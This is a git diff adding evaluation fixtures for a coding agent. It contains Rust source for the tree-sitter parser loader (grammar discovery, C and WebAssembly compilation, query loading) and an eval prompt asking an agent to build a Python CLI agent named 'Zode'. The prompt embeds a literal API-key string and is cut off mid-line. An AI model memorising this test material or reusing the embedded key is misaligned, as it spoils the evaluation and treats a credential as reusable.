"tree-sitter-highlight")] + highlight_names: Box::new(Mutex::new(Vec::new())), + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: true, + debug_build: false, + sanitize_build: false, + force_rebuild: false, + + #[cfg(feature = "wasm")] + wasm_store: Mutex::default(), + } + } + + #[cfg(feature = "tree-sitter-highlight")] + #[cfg_attr(docsrs, doc(cfg(feature = "tree-sitter-highlight")))] + pub fn configure_highlights(&mut self, names: &[String]) { + self.use_all_highlight_names = false; + let mut highlights = self.highlight_names.lock().unwrap(); + highlights.clear(); + highlights.extend(names.iter().cloned()); + } + + #[must_use] + #[cfg(feature = "tree-sitter-highlight")] + #[cfg_attr(docsrs, doc(cfg(feature = "tree-sitter-highlight")))] + pub fn highlight_names(&self) -> Vec { + self.highlight_names.lock().unwrap().clone() + } + + pub fn find_all_languages(&mut self, config: &Config) -> Result<()> { + if config.parser_directories.is_empty() { + eprintln!("Warning: You have not configured any parser directories!"); + eprintln!("Please run `tree-sitter init-config` and edit the resulting"); + eprintln!("configuration file to indicate where we should look for"); + eprintln!("language grammars.\n"); + } + for parser_container_dir in &config.parser_directories { + if let Ok(entries) = fs::read_dir(parser_container_dir) { + for entry in entries { + let entry = entry?; + if let Some(parser_dir_name) = entry.file_name().to_str() { + if parser_dir_name.starts_with("tree-sitter-") { + self.find_language_configurations_at_path( + &parser_container_dir.join(parser_dir_name), + false, + ) + .ok(); + } + } + } + } + } + Ok(()) + } + + pub fn languages_at_path(&mut self, path: &Path) -> Result> { + if let Ok(configurations) = self.find_language_configurations_at_path(path, true) { + let mut language_ids = configurations + .iter() + .map(|c| (c.language_id, c.language_name.clone())) + .collect::>(); + language_ids.sort_unstable(); + language_ids.dedup(); + language_ids + .into_iter() + .map(|(id, name)| Ok((self.language_for_id(id)?, name))) + .collect::>>() + } else { + Ok(Vec::new()) + } + } + + #[must_use] + pub fn get_all_language_configurations(&self) -> Vec<(&LanguageConfiguration, &Path)> { + self.language_configurations + .iter() + .map(|c| (c, self.languages_by_id[c.language_id].0.as_ref())) + .collect() + } + + pub fn language_configuration_for_scope( + &self, + scope: &str, + ) -> Result> { + for configuration in &self.language_configurations { + if configuration.scope.as_ref().is_some_and(|s| s == scope) { + let language = self.language_for_id(configuration.language_id)?; + return Ok(Some((language, configuration))); + } + } + Ok(None) + } + + pub fn language_configuration_for_first_line_regex( + &self, + path: &Path, + ) -> Result> { + self.language_configuration_ids_by_first_line_regex + .iter() + .try_fold(None, |_, (regex, ids)| { + if let Some(regex) = Self::regex(Some(regex)) { + let file = fs::File::open(path)?; + let reader = BufReader::new(file); + let first_line = reader.lines().next().transpose()?; + if let Some(first_line) = first_line { + if regex.is_match(&first_line) && !ids.is_empty() { + let configuration = &self.language_configurations[ids[0]]; + let language = self.language_for_id(configuration.language_id)?; + return Ok(Some((language, configuration))); + } + } + } + + Ok(None) + }) + } + + pub fn language_configuration_for_file_name( + &self, + path: &Path, + ) -> Result> { + // Find all the language configurations that match this file name + // or a suffix of the file name. + let configuration_ids = path + .file_name() + .and_then(|n| n.to_str()) + .and_then(|file_name| self.language_configuration_ids_by_file_type.get(file_name)) + .or_else(|| { + let mut path = path.to_owned(); + let mut extensions = Vec::with_capacity(2); + while let Some(extension) = path.extension() { + extensions.push(extension.to_str()?.to_string()); + path = PathBuf::from(path.file_stem()?.to_os_string()); + } + extensions.reverse(); + self.language_configuration_ids_by_file_type + .get(&extensions.join(".")) + }); + + if let Some(configuration_ids) = configuration_ids { + if !configuration_ids.is_empty() { + let configuration = if configuration_ids.len() == 1 { + &self.language_configurations[configuration_ids[0]] + } + // If multiple language configurations match, then determine which + // one to use by applying the configurations' content regexes. + else { + let file_contents = fs::read(path) + .with_context(|| format!("Failed to read path {}", path.display()))?; + let file_contents = String::from_utf8_lossy(&file_contents); + let mut best_score = -2isize; + let mut best_configuration_id = None; + for configuration_id in configuration_ids { + let config = &self.language_configurations[*configuration_id]; + + // If the language configuration has a content regex, assign + // a score based on the length of the first match. + let score; + if let Some(content_regex) = &config.content_regex { + if let Some(mat) = content_regex.find(&file_contents) { + score = (mat.end() - mat.start()) as isize; + } + // If the content regex does not match, then *penalize* this + // language configuration, so that language configurations + // without content regexes are preferred over those with + // non-matching content regexes. + else { + score = -1; + } + } else { + score = 0; + } + if score > best_score { + best_configuration_id = Some(*configuration_id); + best_score = score; + } + } + + &self.language_configurations[best_configuration_id.unwrap()] + }; + + let language = self.language_for_id(configuration.language_id)?; + return Ok(Some((language, configuration))); + } + } + + Ok(None) + } + + pub fn language_configuration_for_injection_string( + &self, + string: &str, + ) -> Result> { + let mut best_match_length = 0; + let mut best_match_position = None; + for (i, configuration) in self.language_configurations.iter().enumerate() { + if let Some(injection_regex) = &configuration.injection_regex { + if let Some(mat) = injection_regex.find(string) { + let length = mat.end() - mat.start(); + if length > best_match_length { + best_match_position = Some(i); + best_match_length = length; + } + } + } + } + + if let Some(i) = best_match_position { + let configuration = &self.language_configurations[i]; + let language = self.language_for_id(configuration.language_id)?; + Ok(Some((language, configuration))) + } else { + Ok(None) + } + } + + pub fn language_for_configuration( + &self, + configuration: &LanguageConfiguration, + ) -> Result { + self.language_for_id(configuration.language_id) + } + + fn language_for_id(&self, id: usize) -> Result { + let (path, language, externals) = &self.languages_by_id[id]; + language + .get_or_try_init(|| { + let src_path = path.join("src"); + self.load_language_at_path(CompileConfig::new( + &src_path, + externals.as_deref(), + None, + )) + }) + .cloned() + } + + pub fn compile_parser_at_path( + &self, + grammar_path: &Path, + output_path: PathBuf, + flags: &[&str], + ) -> Result<()> { + let src_path = grammar_path.join("src"); + let mut config = CompileConfig::new(&src_path, None, Some(output_path)); + config.flags = flags; + self.load_language_at_path(config).map(|_| ()) + } + + pub fn load_language_at_path(&self, mut config: CompileConfig) -> Result { + let grammar_path = config.src_path.join("grammar.json"); + config.name = Self::grammar_json_name(&grammar_path)?; + self.load_language_at_path_with_name(config) + } + + pub fn load_language_at_path_with_name(&self, mut config: CompileConfig) -> Result { + let mut lib_name = config.name.to_string(); + let language_fn_name = format!( + "tree_sitter_{}", + replace_dashes_with_underscores(&config.name) + ); + if self.debug_build { + lib_name.push_str(".debug._"); + } + + if self.sanitize_build { + lib_name.push_str(".sanitize._"); + config.sanitize = true; + } + + if config.output_path.is_none() { + fs::create_dir_all(&self.parser_lib_path)?; + } + + let mut recompile = self.force_rebuild || config.output_path.is_some(); // if specified, always recompile + + let output_path = config.output_path.unwrap_or_else(|| { + let mut path = self.parser_lib_path.join(lib_name); + path.set_extension(env::consts::DLL_EXTENSION); + #[cfg(feature = "wasm")] + if self.wasm_store.lock().unwrap().is_some() { + path.set_extension("wasm"); + } + path + }); + config.output_path = Some(output_path.clone()); + + let parser_path = config.src_path.join("parser.c"); + config.scanner_path = self.get_scanner_path(config.src_path); + + let mut paths_to_check = vec![parser_path]; + + if let Some(scanner_path) = config.scanner_path.as_ref() { + paths_to_check.push(scanner_path.clone()); + } + + paths_to_check.extend( + config + .external_files + .unwrap_or_default() + .iter() + .map(|p| config.src_path.join(p)), + ); + + if !recompile { + recompile = needs_recompile(&output_path, &paths_to_check) + .with_context(|| "Failed to compare source and binary timestamps")?; + } + + #[cfg(feature = "wasm")] + if let Some(wasm_store) = self.wasm_store.lock().unwrap().as_mut() { + if recompile { + self.compile_parser_to_wasm( + &config.name, + None, + config.src_path, + config + .scanner_path + .as_ref() + .and_then(|p| p.strip_prefix(config.src_path).ok()), + &output_path, + false, + )?; + } + + let wasm_bytes = fs::read(&output_path)?; + return Ok(wasm_store.load_language(&config.name, &wasm_bytes)?); + } + + let lock_path = if env::var("CROSS_RUNNER").is_ok() { + tempfile::tempdir() + .unwrap() + .path() + .join("tree-sitter") + .join("lock") + .join(format!("{}.lock", config.name)) + } else { + etcetera::choose_base_strategy()? + .cache_dir() + .join("tree-sitter") + .join("lock") + .join(format!("{}.lock", config.name)) + }; + + if let Ok(lock_file) = fs::OpenOptions::new().write(true).open(&lock_path) { + recompile = false; + if lock_file.try_lock_exclusive().is_err() { + // if we can't acquire the lock, another process is compiling the parser, wait for + // it and don't recompile + lock_file.lock_exclusive()?; + recompile = false; + } else { + // if we can acquire the lock, check if the lock file is older than 30 seconds, a + // run that was interrupted and left the lock file behind should not block + // subsequent runs + let time = lock_file.metadata()?.modified()?.elapsed()?.as_secs(); + if time > 30 { + fs::remove_file(&lock_path)?; + recompile = true; + } + } + } + + if recompile { + fs::create_dir_all(lock_path.parent().unwrap()).with_context(|| { + format!( + "Failed to create directory {}", + lock_path.parent().unwrap().display() + ) + })?; + let lock_file = fs::OpenOptions::new() + .create(true) + .truncate(true) + .write(true) + .open(&lock_path)?; + lock_file.lock_exclusive()?; + + self.compile_parser_to_dylib(&config, &lock_file, &lock_path)?; + + if config.scanner_path.is_some() { + self.check_external_scanner(&config.name, &output_path)?; + } + } + + let library = unsafe { Library::new(&output_path) } + .with_context(|| format!("Error opening dynamic library {}", output_path.display()))?; + let language = unsafe { + let language_fn = library + .get:: Language>>(language_fn_name.as_bytes()) + .with_context(|| format!("Failed to load symbol {language_fn_name}"))?; + language_fn() + }; + mem::forget(library); + Ok(language) + } + + fn compile_parser_to_dylib( + &self, + config: &CompileConfig, + lock_file: &fs::File, + lock_path: &Path, + ) -> Result<(), Error> { + let mut cc_config = cc::Build::new(); + cc_config + .cargo_metadata(false) + .cargo_warnings(false) + .target(BUILD_TARGET) + .host(BUILD_HOST) + .debug(self.debug_build) + .file(&config.parser_path) + .includes(&config.header_paths) + .std("c11"); + + if let Some(scanner_path) = config.scanner_path.as_ref() { + cc_config.file(scanner_path); + } + + if self.debug_build { + cc_config.opt_level(0).extra_warnings(true); + } else { + cc_config.opt_level(2).extra_warnings(false); + } + + for flag in config.flags { + cc_config.define(flag, None); + } + + let compiler = cc_config.get_compiler(); + let mut command = Command::new(compiler.path()); + command.args(compiler.args()); + for (key, value) in compiler.env() { + command.env(key, value); + } + + let output_path = config.output_path.as_ref().unwrap(); + + if compiler.is_like_msvc() { + let out = format!("-out:{}", output_path.to_str().unwrap()); + command.arg(if self.debug_build { "-LDd" } else { "-LD" }); + command.arg("-utf-8"); + command.args(cc_config.get_files()); + command.arg("-link").arg(out); + } else { + command.arg("-Werror=implicit-function-declaration"); + if cfg!(any(target_os = "macos", target_os = "ios")) { + command.arg("-dynamiclib"); + // TODO: remove when supported + command.arg("-UTREE_SITTER_REUSE_ALLOCATOR"); + } else { + command.arg("-shared"); + } + command.args(cc_config.get_files()); + command.arg("-o").arg(output_path); + } + + let output = command.output().with_context(|| { + format!("Failed to execute the C compiler with the following command:\n{command:?}") + })?; + + FileExt::unlock(lock_file)?; + fs::remove_file(lock_path)?; + anyhow::ensure!( + output.status.success(), + "Parser compilation failed.\nStdout: {}\nStderr: {}", + String::from_utf8_lossy(&output.stdout), + String::from_utf8_lossy(&output.stderr) + ); + Ok(()) + } + + #[cfg(unix)] + fn check_external_scanner(&self, name: &str, library_path: &Path) -> Result<()> { + let prefix = if cfg!(any(target_os = "macos", target_os = "ios")) { + "_" + } else { + "" + }; + let mut must_have = vec![ + format!("{prefix}tree_sitter_{name}_external_scanner_create"), + format!("{prefix}tree_sitter_{name}_external_scanner_destroy"), + format!("{prefix}tree_sitter_{name}_external_scanner_serialize"), + format!("{prefix}tree_sitter_{name}_external_scanner_deserialize"), + format!("{prefix}tree_sitter_{name}_external_scanner_scan"), + ]; + + let command = Command::new("nm") + .arg("-W") + .arg("-U") + .arg(library_path) + .output(); + if let Ok(output) = command { + if output.status.success() { + let mut found_non_static = false; + for line in String::from_utf8_lossy(&output.stdout).lines() { + if line.contains(" T ") { + if let Some(function_name) = + line.split_whitespace().collect::>().get(2) + { + if !line.contains("tree_sitter_") { + if !found_non_static { + found_non_static = true; + eprintln!( + "Warning: Found non-static non-tree-sitter functions in the external scanner" + ); + } + eprintln!(" `{function_name}`"); + } else { + must_have.retain(|f| f != function_name); + } + } + } + } + if found_non_static { + eprintln!( + "Consider making these functions static, they can cause conflicts when another tree-sitter project uses the same function name" + ); + } + + if !must_have.is_empty() { + let missing = must_have + .iter() + .map(|f| format!(" `{f}`")) + .collect::>() + .join("\n"); + anyhow::bail!(format!(indoc! {" + Missing required functions in the external scanner, parsing won't work without these! + + {missing} + + You can read more about this at https://tree-sitter.github.io/tree-sitter/creating-parsers/4-external-scanners + "})); + } + } + } + + Ok(()) + } + + #[cfg(windows)] + fn check_external_scanner(&self, _name: &str, _library_path: &Path) -> Result<()> { + // TODO: there's no nm command on windows, whoever wants to implement this can and should :) + + // let mut must_have = vec![ + // format!("tree_sitter_{name}_external_scanner_create"), + // format!("tree_sitter_{name}_external_scanner_destroy"), + // format!("tree_sitter_{name}_external_scanner_serialize"), + // format!("tree_sitter_{name}_external_scanner_deserialize"), + // format!("tree_sitter_{name}_external_scanner_scan"), + // ]; + + Ok(()) + } + + pub fn compile_parser_to_wasm( + &self, + language_name: &str, + root_path: Option<&Path>, + src_path: &Path, + scanner_filename: Option<&Path>, + output_path: &Path, + force_docker: bool, + ) -> Result<(), Error> { + #[derive(PartialEq, Eq)] + enum EmccSource { + Native, + Docker, + Podman, + } + + let root_path = root_path.unwrap_or(src_path); + let emcc_name = if cfg!(windows) { "emcc.bat" } else { "emcc" }; + + // Order of preference: emscripten > docker > podman > error + let source = if !force_docker && Command::new(emcc_name).output().is_ok() { + EmccSource::Native + } else if Command::new("docker") + .output() + .is_ok_and(|out| out.status.success()) + { + EmccSource::Docker + } else if Command::new("podman") + .arg("--version") + .output() + .is_ok_and(|out| out.status.success()) + { + EmccSource::Podman + } else { + anyhow::bail!( + "You must have either emcc, docker, or podman on your PATH to run this command" + ); + }; + + let mut command = match source { + EmccSource::Native => { + let mut command = Command::new(emcc_name); + command.current_dir(src_path); + command + } + + EmccSource::Docker | EmccSource::Podman => { + let mut command = match source { + EmccSource::Docker => Command::new("docker"), + EmccSource::Podman => Command::new("podman"), + EmccSource::Native => unreachable!(), + }; + command.args(["run", "--rm"]); + + // The working directory is the directory containing the parser itself + let workdir = if root_path == src_path { + PathBuf::from("/src") + } else { + let mut path = PathBuf::from("/src"); + path.push(src_path.strip_prefix(root_path).unwrap()); + path + }; + command.args(["--workdir", &workdir.to_slash_lossy()]); + + // Mount the root directory as a volume, which is the repo root + let mut volume_string = OsString::from(&root_path); + volume_string.push(":/src:Z"); + command.args([OsStr::new("--volume"), &volume_string]); + + // In case `docker` is an alias to `podman`, ensure that podman + // mounts the current directory as writable by the container + // user which has the same uid as the host user. Setting the + // podman-specific variable is more reliable than attempting to + // detect whether `docker` is an alias for `podman`. + // see https://docs.podman.io/en/latest/markdown/podman-run.1.html#userns-mode + command.env("PODMAN_USERNS", "keep-id"); + + // Get the current user id so that files created in the docker container will have + // the same owner. + #[cfg(unix)] + { + #[link(name = "c")] + extern "C" { + fn getuid() -> u32; + } + // don't need to set user for podman since PODMAN_USERNS=keep-id is already set + if source == EmccSource::Docker { + let user_id = unsafe { getuid() }; + command.args(["--user", &user_id.to_string()]); + } + }; + + // Run `emcc` in a container using the `emscripten-slim` image + command.args([EMSCRIPTEN_TAG, "emcc"]); + command + } + }; + + let output_name = "output.wasm"; + + command.args([ + "-o", + output_name, + "-Os", + "-s", + "WASM=1", + "-s", + "SIDE_MODULE=2", + "-s", + "TOTAL_MEMORY=33554432", + "-s", + "NODEJS_CATCH_EXIT=0", + "-s", + &format!("EXPORTED_FUNCTIONS=[\"_tree_sitter_{language_name}\"]"), + "-fno-exceptions", + "-fvisibility=hidden", + "-I", + ".", + ]); + + if let Some(scanner_filename) = scanner_filename { + command.arg(scanner_filename); + } + + command.arg("parser.c"); + let status = command + .spawn() + .with_context(|| "Failed to run emcc command")? + .wait()?; + anyhow::ensure!(status.success(), "emcc command failed"); + let source_path = src_path.join(output_name); + fs::rename(&source_path, &output_path).with_context(|| { + format!("failed to rename wasm output file from {source_path:?} to {output_path:?}") + })?; + + Ok(()) + } + + #[must_use] + #[cfg(feature = "tree-sitter-highlight")] + pub fn highlight_config_for_injection_string<'a>( + &'a self, + string: &str, + ) -> Option<&'a HighlightConfiguration> { + match self.language_configuration_for_injection_string(string) { + Err(e) => { + eprintln!("Failed to load language for injection string '{string}': {e}",); + None + } + Ok(None) => None, + Ok(Some((language, configuration))) => { + match configuration.highlight_config(language, None) { + Err(e) => { + eprintln!( + "Failed to load property sheet for injection string '{string}': {e}", + ); + None + } + Ok(None) => None, + Ok(Some(config)) => Some(config), + } + } + } + } + + #[must_use] + pub fn get_language_configuration_in_current_path(&self) -> Option<&LanguageConfiguration> { + self.language_configuration_in_current_path + .map(|i| &self.language_configurations[i]) + } + + pub fn find_language_configurations_at_path( + &mut self, + parser_path: &Path, + set_current_path_config: bool, + ) -> Result<&[LanguageConfiguration]> { + let initial_language_configuration_count = self.language_configurations.len(); + + let ts_json = TreeSitterJSON::from_file(parser_path); + if let Ok(config) = ts_json { + let language_count = self.languages_by_id.len(); + for grammar in config.grammars { + // Determine the path to the parser directory. This can be specified in + // the tree-sitter.json, but defaults to the directory containing the + // tree-sitter.json. + let language_path = parser_path.join(grammar.path.unwrap_or(PathBuf::from("."))); + + // Determine if a previous language configuration in this package.json file + // already uses the same language. + let mut language_id = None; + for (id, (path, _, _)) in + self.languages_by_id.iter().enumerate().skip(language_count) + { + if language_path == *path { + language_id = Some(id); + } + } + + // If not, add a new language path to the list. + let language_id = if let Some(language_id) = language_id { + language_id + } else { + self.languages_by_id.push(( + language_path, + OnceCell::new(), + grammar.external_files.clone().into_vec().map(|files| { + files.into_iter() + .map(|path| { + let path = parser_path.join(path); + // prevent p being above/outside of parser_path + anyhow::ensure!(path.starts_with(parser_path), "External file path {path:?} is outside of parser directory {parser_path:?}"); + Ok(path) + }) + .collect::>>() + }).transpose()?, + )); + self.languages_by_id.len() - 1 + }; + + let configuration = LanguageConfiguration { + root_path: parser_path.to_path_buf(), + language_name: grammar.name, + scope: Some(grammar.scope), + language_id, + file_types: grammar.file_types.unwrap_or_default(), + content_regex: Self::regex(grammar.content_regex.as_deref()), + first_line_regex: Self::regex(grammar.first_line_regex.as_deref()), + injection_regex: Self::regex(grammar.injection_regex.as_deref()), + injections_filenames: grammar.injections.into_vec(), + locals_filenames: grammar.locals.into_vec(), + tags_filenames: grammar.tags.into_vec(), + highlights_filenames: grammar.highlights.into_vec(), + #[cfg(feature = "tree-sitter-highlight")] + highlight_config: OnceCell::new(), + #[cfg(feature = "tree-sitter-tags")] + tags_config: OnceCell::new(), + #[cfg(feature = "tree-sitter-highlight")] + highlight_names: &self.highlight_names, + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: self.use_all_highlight_names, + }; + + for file_type in &configuration.file_types { + self.language_configuration_ids_by_file_type + .entry(file_type.to_string()) + .or_default() + .push(self.language_configurations.len()); + } + if let Some(first_line_regex) = &configuration.first_line_regex { + self.language_configuration_ids_by_first_line_regex + .entry(first_line_regex.to_string()) + .or_default() + .push(self.language_configurations.len()); + } + + self.language_configurations.push(unsafe { + mem::transmute::, LanguageConfiguration<'static>>( + configuration, + ) + }); + + if set_current_path_config && self.language_configuration_in_current_path.is_none() + { + self.language_configuration_in_current_path = + Some(self.language_configurations.len() - 1); + } + } + } else if let Err(e) = ts_json { + match e.downcast_ref::() { + // This is noisy, and not really an issue. + Some(e) if e.kind() == std::io::ErrorKind::NotFound => {} + _ => { + eprintln!( + "Warning: Failed to parse {} -- {e}", + parser_path.join("tree-sitter.json").display() + ); + } + } + } + + // If we didn't find any language configurations in the tree-sitter.json file, + // but there is a grammar.json file, then use the grammar file to form a simple + // language configuration. + if self.language_configurations.len() == initial_language_configuration_count + && parser_path.join("src").join("grammar.json").exists() + { + let grammar_path = parser_path.join("src").join("grammar.json"); + let language_name = Self::grammar_json_name(&grammar_path)?; + let configuration = LanguageConfiguration { + root_path: parser_path.to_owned(), + language_name, + language_id: self.languages_by_id.len(), + file_types: Vec::new(), + scope: None, + content_regex: None, + first_line_regex: None, + injection_regex: None, + injections_filenames: None, + locals_filenames: None, + highlights_filenames: None, + tags_filenames: None, + #[cfg(feature = "tree-sitter-highlight")] + highlight_config: OnceCell::new(), + #[cfg(feature = "tree-sitter-tags")] + tags_config: OnceCell::new(), + #[cfg(feature = "tree-sitter-highlight")] + highlight_names: &self.highlight_names, + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: self.use_all_highlight_names, + }; + self.language_configurations.push(unsafe { + mem::transmute::, LanguageConfiguration<'static>>( + configuration, + ) + }); + self.languages_by_id + .push((parser_path.to_owned(), OnceCell::new(), None)); + } + + Ok(&self.language_configurations[initial_language_configuration_count..]) + } + + fn regex(pattern: Option<&str>) -> Option { + pattern.and_then(|r| RegexBuilder::new(r).multi_line(true).build().ok()) + } + + fn grammar_json_name(grammar_path: &Path) -> Result { + let file = fs::File::open(grammar_path).with_context(|| { + format!("Failed to open grammar.json at {}", grammar_path.display()) + })?; + + let first_three_lines = BufReader::new(file) + .lines() + .take(3) + .collect::, _>>() + .with_context(|| { + format!( + "Failed to read the first three lines of grammar.json at {}", + grammar_path.display() + ) + })? + .join("\n"); + + let name = GRAMMAR_NAME_REGEX + .captures(&first_three_lines) + .and_then(|c| c.get(1)) + .with_context(|| { + format!("Failed to parse the language name from grammar.json at {grammar_path:?}") + })?; + + Ok(name.as_str().to_string()) + } + + pub fn select_language( + &mut self, + path: &Path, + current_dir: &Path, + scope: Option<&str>, + ) -> Result { + if let Some(scope) = scope { + if let Some(config) = self + .language_configuration_for_scope(scope) + .with_context(|| format!("Failed to load language for scope '{scope}'"))? + { + Ok(config.0) + } else { + anyhow::bail!("Unknown scope '{scope}'") + } + } else if let Some((lang, _)) = self + .language_configuration_for_file_name(path) + .with_context(|| { + format!( + "Failed to load language for file name {}", + path.file_name().unwrap().to_string_lossy() + ) + })? + { + Ok(lang) + } else if let Some(id) = self.language_configuration_in_current_path { + Ok(self.language_for_id(self.language_configurations[id].language_id)?) + } else if let Some(lang) = self + .languages_at_path(current_dir) + .with_context(|| "Failed to load language in current directory")? + .first() + .cloned() + { + Ok(lang.0) + } else if let Some(lang) = self.language_configuration_for_first_line_regex(path)? { + Ok(lang.0) + } else { + anyhow::bail!("No language found"); + } + } + + pub fn debug_build(&mut self, flag: bool) { + self.debug_build = flag; + } + + pub fn sanitize_build(&mut self, flag: bool) { + self.sanitize_build = flag; + } + + pub fn force_rebuild(&mut self, rebuild: bool) { + self.force_rebuild = rebuild; + } + + #[cfg(feature = "wasm")] + #[cfg_attr(docsrs, doc(cfg(feature = "wasm")))] + pub fn use_wasm(&mut self, engine: &tree_sitter::wasmtime::Engine) { + *self.wasm_store.lock().unwrap() = Some(tree_sitter::WasmStore::new(engine).unwrap()); + } + + #[must_use] + pub fn get_scanner_path(&self, src_path: &Path) -> Option { + let path = src_path.join("scanner.c"); + path.exists().then_some(path) + } +} + +impl LanguageConfiguration<'_> { + #[cfg(feature = "tree-sitter-highlight")] + pub fn highlight_config( + &self, + language: Language, + paths: Option<&[PathBuf]>, + ) -> Result> { + let (highlights_filenames, injections_filenames, locals_filenames) = match paths { + Some(paths) => ( + Some( + paths + .iter() + .filter(|p| p.ends_with("highlights.scm")) + .cloned() + .collect::>(), + ), + Some( + paths + .iter() + .filter(|p| p.ends_with("tags.scm")) + .cloned() + .collect::>(), + ), + Some( + paths + .iter() + .filter(|p| p.ends_with("locals.scm")) + .cloned() + .collect::>(), + ), + ), + None => (None, None, None), + }; + self.highlight_config + .get_or_try_init(|| { + let (highlights_query, highlight_ranges) = self.read_queries( + if highlights_filenames.is_some() { + highlights_filenames.as_deref() + } else { + self.highlights_filenames.as_deref() + }, + "highlights.scm", + )?; + let (injections_query, injection_ranges) = self.read_queries( + if injections_filenames.is_some() { + injections_filenames.as_deref() + } else { + self.injections_filenames.as_deref() + }, + "injections.scm", + )?; + let (locals_query, locals_ranges) = self.read_queries( + if locals_filenames.is_some() { + locals_filenames.as_deref() + } else { + self.locals_filenames.as_deref() + }, + "locals.scm", + )?; + + if highlights_query.is_empty() { + Ok(None) + } else { + let mut result = HighlightConfiguration::new( + language, + &self.language_name, + &highlights_query, + &injections_query, + &locals_query, + ) + .map_err(|error| match error.kind { + QueryErrorKind::Language => Error::from(error), + _ => { + if error.offset < injections_query.len() { + Self::include_path_in_query_error( + error, + &injection_ranges, + &injections_query, + 0, + ) + } else if error.offset < injections_query.len() + locals_query.len() { + Self::include_path_in_query_error( + error, + &locals_ranges, + &locals_query, + injections_query.len(), + ) + } else { + Self::include_path_in_query_error( + error, + &highlight_ranges, + &highlights_query, + injections_query.len() + locals_query.len(), + ) + } + } + })?; + let mut all_highlight_names = self.highlight_names.lock().unwrap(); + if self.use_all_highlight_names { + for capture_name in result.query.capture_names() { + if !all_highlight_names.iter().any(|x| x == capture_name) { + all_highlight_names.push((*capture_name).to_string()); + } + } + } + result.configure(all_highlight_names.as_slice()); + drop(all_highlight_names); + Ok(Some(result)) + } + }) + .map(Option::as_ref) + } + + #[cfg(feature = "tree-sitter-tags")] + pub fn tags_config(&self, language: Language) -> Result> { + self.tags_config + .get_or_try_init(|| { + let (tags_query, tags_ranges) = + self.read_queries(self.tags_filenames.as_deref(), "tags.scm")?; + let (locals_query, locals_ranges) = + self.read_queries(self.locals_filenames.as_deref(), "locals.scm")?; + if tags_query.is_empty() { + Ok(None) + } else { + TagsConfiguration::new(language, &tags_query, &locals_query) + .map(Some) + .map_err(|error| { + if let TagsError::Query(error) = error { + if error.offset < locals_query.len() { + Self::include_path_in_query_error( + error, + &locals_ranges, + &locals_query, + 0, + ) + } else { + Self::include_path_in_query_error( + error, + &tags_ranges, + &tags_query, + locals_query.len(), + ) + } + } else { + error.into() + } + }) + } + }) + .map(Option::as_ref) + } + + #[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] + fn include_path_in_query_error( + mut error: QueryError, + ranges: &[(PathBuf, Range)], + source: &str, + start_offset: usize, + ) -> Error { + let offset_within_section = error.offset - start_offset; + let (path, range) = ranges + .iter() + .find(|(_, range)| range.contains(&offset_within_section)) + .unwrap_or_else(|| ranges.last().unwrap()); + error.offset = offset_within_section - range.start; + error.row = source[range.start..offset_within_section] + .matches('\n') + .count(); + Error::from(error).context(format!("Error in query file {}", path.display())) + } + + #[allow(clippy::type_complexity)] + #[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] + fn read_queries( + &self, + paths: Option<&[PathBuf]>, + default_path: &str, + ) -> Result<(String, Vec<(PathBuf, Range)>)> { + let mut query = String::new(); + let mut path_ranges = Vec::new(); + if let Some(paths) = paths { + for path in paths { + let abs_path = self.root_path.join(path); + let prev_query_len = query.len(); + query += &fs::read_to_string(&abs_path) + .with_context(|| format!("Failed to read query file {}", path.display()))?; + path_ranges.push((path.clone(), prev_query_len..query.len())); + } + } else { + // highlights.scm is needed to test highlights, and tags.scm to test tags + if default_path == "highlights.scm" || default_path == "tags.scm" { + eprintln!( + indoc! {" + Warning: you should add a `{}` entry pointing to the highlights path in the `tree-sitter` object in the grammar's tree-sitter.json file. + See more here: https://tree-sitter.github.io/tree-sitter/3-syntax-highlighting#query-paths + "}, + default_path.replace(".scm", "") + ); + } + let queries_path = self.root_path.join("queries"); + let path = queries_path.join(default_path); + if path.exists() { + query = fs::read_to_string(&path) + .with_context(|| format!("Failed to read query file {}", path.display()))?; + path_ranges.push((PathBuf::from(default_path), 0..query.len())); + } + } + + Ok((query, path_ranges)) + } +} + +fn needs_recompile(lib_path: &Path, paths_to_check: &[PathBuf]) -> Result { + if !lib_path.exists() { + return Ok(true); + } + let lib_mtime = mtime(lib_path) + .with_context(|| format!("Failed to read mtime of {}", lib_path.display()))?; + for path in paths_to_check { + if mtime(path)? > lib_mtime { + return Ok(true); + } + } + Ok(false) +} + +fn mtime(path: &Path) -> Result { + Ok(fs::metadata(path)?.modified()?) +} + +fn replace_dashes_with_underscores(name: &str) -> String { + let mut result = String::with_capacity(name.len()); + for c in name.chars() { + if c == '-' { + result.push('_'); + } else { + result.push(c); + } + } + result +} diff --git a/crates/agent/src/tools/evals/fixtures/zode/prompt.md b/crates/agent/src/tools/evals/fixtures/zode/prompt.md new file mode 100644 index 0000000000000000000000000000000000000000..29755d441f7a4f74709c1ac414e2a9a73fe6ac21 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/zode/prompt.md @@ -0,0 +1,2193 @@ +- We're building a CLI code agent tool called Zode that is intended to work like Aider or Claude code +- We're starting from a completely blank project +- Like Aider/Claude Code you take the user's initial prompt and then call the LLM and perform tool calls in a loop until the ultimate goal is achieved. +- Unlike Aider or Claude code, it's not intended to be interactive. Once the initial prompt is passed in, there will be no further input from the user. +- The system you will build must reach the stated goal just by performing tool calls and calling the LLM +- I want you to build this in python. Use the anthropic python sdk and the model context protocol sdk. Use a virtual env and pip to install dependencies +- Follow the anthropic guidance on tool calls: https://docs.anthropic.com/en/docs/build-with-claude/tool-use/overview +- Use this Anthropic model: `claude-3-7-sonnet-20250219` +- Use this Anthropic API Key: `sk-ant-api03-qweeryiofdjsncmxquywefidopsugus` +- One of the most important pieces to this is having good tool calls. We will be using the tools provided by the Claude MCP server. You can start this server using `claude mcp serve` and then you will need to write code that acts as an MCP **client** to connect to this mcp server via MCP. Likely you want to start this using a subprocess. The JSON schema showing the tools available via this sdk are available below. Via this MCP server you have access to all the tools that zode needs: Bash, GlobTool, GrepTool, LS, View, Edit, Replace, WebFetchTool +- The cli tool should be invocable via python zode.py file.md where file.md is any possible file that contains the users prompt. As a reminder, there will be no further input from the user after this initial prompt. Zode must take it from there and call the LLM and tools until the user goal is accomplished +- Try and keep all code in zode.py and make heavy use of the asks I mentioned +- Once you’ve implemented this, you must run python zode.py eval/instructions.md to see how well our new agent tool does! + +Anthropic 